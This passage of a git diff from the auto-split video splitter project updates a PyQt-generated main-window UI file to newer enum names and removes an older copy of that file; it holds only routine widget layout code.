icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) -+ icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) -- MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight) -+ MainWindow.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) -@@ -49,7 +51,7 @@ class Ui_MainWindow(object): - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) -- self.browseButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.browseButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) -@@ -74,7 +76,7 @@ class Ui_MainWindow(object): - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = 
QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) -- self.selectregionButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.selectregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) -@@ -87,26 +89,26 @@ class Ui_MainWindow(object): - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) -- self.startautosplitterButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.startautosplitterButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) -- self.resetButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.resetButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) -- self.undosplitButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.undosplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) -- self.skipsplitButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.skipsplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) -- self.checkfpsButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.checkfpsButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) -@@ -152,7 +154,7 @@ class Ui_MainWindow(object): - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) -- self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.StrongFocus) -+ self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.FocusPolicy.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) -@@ -169,86 +171,86 @@ class Ui_MainWindow(object): - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) -- self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - 
self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) -- self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) -- self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) -- self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) -- self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) -- self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_bottom.setLineWidth(1) -- self.line_live_bottom.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_live_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) -- self.line_live_top.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_top.setLineWidth(1) -- self.line_live_top.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_live_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) -- self.line_live_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_right.setLineWidth(1) -- self.line_live_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_live_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) -- self.line_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_left.setLineWidth(1) -- self.line_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - 
self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) -- self.line_live_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_live_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_live_left.setLineWidth(1) -- self.line_live_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_live_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) -- self.line_split_left.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_left.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_left.setLineWidth(1) -- self.line_split_left.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_split_left.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) -- self.line_split_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_right.setLineWidth(1) -- self.line_split_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_split_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) -- self.line_split_top.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_top.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_top.setLineWidth(1) -- self.line_split_top.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_split_top.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) -- self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_split_bottom.setLineWidth(1) -- self.line_split_bottom.setFrameShape(QtWidgets.QFrame.HLine) -+ self.line_split_bottom.setFrameShape(QtWidgets.QFrame.Shape.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) -- self.line_right.setFrameShadow(QtWidgets.QFrame.Plain) -+ self.line_right.setFrameShadow(QtWidgets.QFrame.Shadow.Plain) - self.line_right.setLineWidth(1) -- self.line_right.setFrameShape(QtWidgets.QFrame.VLine) -+ self.line_right.setFrameShape(QtWidgets.QFrame.Shape.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) -@@ -259,7 +261,7 @@ class Ui_MainWindow(object): - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) -- self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignCenter) -+ 
self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) -@@ -305,16 +307,16 @@ class Ui_MainWindow(object): - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) -- self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) -- self.takescreenshotButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.takescreenshotButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) -- self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) -+ self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) -@@ -323,7 +325,7 @@ class Ui_MainWindow(object): - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) -- self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) -+ self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.ButtonSymbols.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) -@@ -362,7 +364,7 @@ class Ui_MainWindow(object): - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) -- self.alignregionButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.alignregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) -@@ -370,7 +372,7 @@ class Ui_MainWindow(object): - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) -- self.selectwindowButton.setFocusPolicy(QtCore.Qt.NoFocus) -+ self.selectwindowButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() -@@ -453,15 +455,15 @@ class Ui_MainWindow(object): - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) -- self.actionView_Help = QtWidgets.QAction(MainWindow) -+ self.actionView_Help = QtWidgets.QWidgetAction(MainWindow) - 
self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) -- self.actionAbout = QtWidgets.QAction(MainWindow) -+ self.actionAbout = QtWidgets.QWidgetAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) -- self.actionSave_Settings = QtWidgets.QAction(MainWindow) -+ self.actionSave_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) -- self.actionSave_Settings_As = QtWidgets.QAction(MainWindow) -+ self.actionSave_Settings_As = QtWidgets.QWidgetAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) -- self.actionLoad_Settings = QtWidgets.QAction(MainWindow) -+ self.actionLoad_Settings = QtWidgets.QWidgetAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) -@@ -558,4 +560,4 @@ if __name__ == "__main__": - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() -- sys.exit(app.exec_()) -+ sys.exit(app.exec()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py deleted file mode 100644 index 36b0b66..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.source.py +++ /dev/null @@ -1,561 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'design.ui' -# -# Created by: PyQt5 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) - sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) - MainWindow.setSizePolicy(sizePolicy) - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Normal, QtGui.QIcon.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) - MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) - self.splitimagefolderLabel.setGeometry(QtCore.QRect(90, 13, 91, 16)) - self.splitimagefolderLabel.setObjectName(_fromUtf8("splitimagefolderLabel")) - self.splitimagefolderLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitimagefolderLineEdit.setGeometry(QtCore.QRect(187, 11, 247, 20)) - self.splitimagefolderLineEdit.setReadOnly(True) - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = 
QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) - self.browseButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) - self.xLabel.setObjectName(_fromUtf8("xLabel")) - self.liveimageCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.liveimageCheckBox.setEnabled(True) - self.liveimageCheckBox.setGeometry(QtCore.QRect(125, 253, 121, 17)) - self.liveimageCheckBox.setChecked(True) - self.liveimageCheckBox.setTristate(False) - self.liveimageCheckBox.setObjectName(_fromUtf8("liveimageCheckBox")) - self.loopCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.loopCheckBox.setEnabled(True) - self.loopCheckBox.setGeometry(QtCore.QRect(500, 314, 121, 17)) - self.loopCheckBox.setChecked(False) - self.loopCheckBox.setTristate(False) - self.loopCheckBox.setObjectName(_fromUtf8("loopCheckBox")) - self.autostartonresetCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.autostartonresetCheckBox.setEnabled(True) - self.autostartonresetCheckBox.setGeometry(QtCore.QRect(500, 344, 121, 17)) - self.autostartonresetCheckBox.setChecked(False) - self.autostartonresetCheckBox.setTristate(False) - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) - self.selectregionButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) - self.similaritythresholdLabel.setObjectName(_fromUtf8("similaritythresholdLabel")) - self.similaritythresholdDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.similaritythresholdDoubleSpinBox.setGeometry(QtCore.QRect(160, 383, 64, 22)) - self.similaritythresholdDoubleSpinBox.setMaximum(1.0) - self.similaritythresholdDoubleSpinBox.setSingleStep(0.01) - self.similaritythresholdDoubleSpinBox.setProperty("value", 0.9) - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) - self.startautosplitterButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) - self.resetButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) - self.undosplitButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) - self.skipsplitButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - 
self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) - self.checkfpsButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) - self.fpsLabel.setObjectName(_fromUtf8("fpsLabel")) - self.showlivesimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showlivesimilarityCheckBox.setEnabled(True) - self.showlivesimilarityCheckBox.setGeometry(QtCore.QRect(10, 330, 111, 17)) - self.showlivesimilarityCheckBox.setChecked(True) - self.showlivesimilarityCheckBox.setTristate(False) - self.showlivesimilarityCheckBox.setObjectName(_fromUtf8("showlivesimilarityCheckBox")) - self.showhighestsimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showhighestsimilarityCheckBox.setEnabled(True) - self.showhighestsimilarityCheckBox.setGeometry(QtCore.QRect(10, 351, 131, 17)) - self.showhighestsimilarityCheckBox.setChecked(True) - self.showhighestsimilarityCheckBox.setTristate(False) - self.showhighestsimilarityCheckBox.setObjectName(_fromUtf8("showhighestsimilarityCheckBox")) - self.livesimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.livesimilarityLabel.setGeometry(QtCore.QRect(160, 332, 46, 13)) - self.livesimilarityLabel.setText(_fromUtf8("")) - self.livesimilarityLabel.setObjectName(_fromUtf8("livesimilarityLabel")) - self.highestsimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.highestsimilarityLabel.setGeometry(QtCore.QRect(160, 353, 46, 13)) - self.highestsimilarityLabel.setText(_fromUtf8("")) - self.highestsimilarityLabel.setObjectName(_fromUtf8("highestsimilarityLabel")) - self.splitLabel = QtWidgets.QLabel(self.centralwidget) - self.splitLabel.setGeometry(QtCore.QRect(249, 317, 61, 16)) - self.splitLabel.setObjectName(_fromUtf8("splitLabel")) - self.resetLabel = QtWidgets.QLabel(self.centralwidget) - self.resetLabel.setGeometry(QtCore.QRect(249, 341, 61, 16)) - self.resetLabel.setObjectName(_fromUtf8("resetLabel")) - self.skiptsplitLabel = QtWidgets.QLabel(self.centralwidget) - self.skiptsplitLabel.setGeometry(QtCore.QRect(249, 367, 50, 16)) - self.skiptsplitLabel.setObjectName(_fromUtf8("skiptsplitLabel")) - self.undosplitLabel = QtWidgets.QLabel(self.centralwidget) - self.undosplitLabel.setGeometry(QtCore.QRect(249, 393, 61, 16)) - self.undosplitLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.pausehotkeyLabel = QtWidgets.QLabel(self.centralwidget) - self.pausehotkeyLabel.setGeometry(QtCore.QRect(249, 418, 61, 16)) - self.pausehotkeyLabel.setObjectName(_fromUtf8("undosplitLabel")) - self.splitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitLineEdit.setGeometry(QtCore.QRect(316, 314, 81, 20)) - self.splitLineEdit.setReadOnly(True) - self.splitLineEdit.setObjectName(_fromUtf8("splitLineEdit")) - self.undosplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.undosplitLineEdit.setGeometry(QtCore.QRect(316, 391, 81, 20)) - self.undosplitLineEdit.setFocusPolicy(QtCore.Qt.StrongFocus) - self.undosplitLineEdit.setReadOnly(True) - self.undosplitLineEdit.setObjectName(_fromUtf8("undosplitLineEdit")) - self.skipsplitLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.skipsplitLineEdit.setGeometry(QtCore.QRect(316, 365, 81, 20)) - self.skipsplitLineEdit.setReadOnly(True) - 
self.skipsplitLineEdit.setObjectName(_fromUtf8("skipsplitLineEdit")) - self.resetLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.resetLineEdit.setGeometry(QtCore.QRect(316, 339, 81, 20)) - self.resetLineEdit.setReadOnly(True) - self.resetLineEdit.setObjectName(_fromUtf8("resetLineEdit")) - self.pausehotkeyLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.pausehotkeyLineEdit.setGeometry(QtCore.QRect(316, 416, 81, 20)) - self.pausehotkeyLineEdit.setReadOnly(True) - self.pausehotkeyLineEdit.setObjectName(_fromUtf8("pausehotkeyLineEdit")) - self.setsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setsplithotkeyButton.setGeometry(QtCore.QRect(409, 314, 71, 21)) - self.setsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setsplithotkeyButton.setObjectName(_fromUtf8("setsplithotkeyButton")) - self.setresethotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setresethotkeyButton.setGeometry(QtCore.QRect(410, 339, 71, 21)) - self.setresethotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setresethotkeyButton.setObjectName(_fromUtf8("setresethotkeyButton")) - self.setskipsplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setskipsplithotkeyButton.setGeometry(QtCore.QRect(410, 365, 71, 21)) - self.setskipsplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setskipsplithotkeyButton.setObjectName(_fromUtf8("setskipsplithotkeyButton")) - self.setundosplithotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setundosplithotkeyButton.setGeometry(QtCore.QRect(410, 391, 71, 21)) - self.setundosplithotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setundosplithotkeyButton.setObjectName(_fromUtf8("setundosplithotkeyButton")) - self.setpausehotkeyButton = QtWidgets.QPushButton(self.centralwidget) - self.setpausehotkeyButton.setGeometry(QtCore.QRect(410, 416, 71, 21)) - 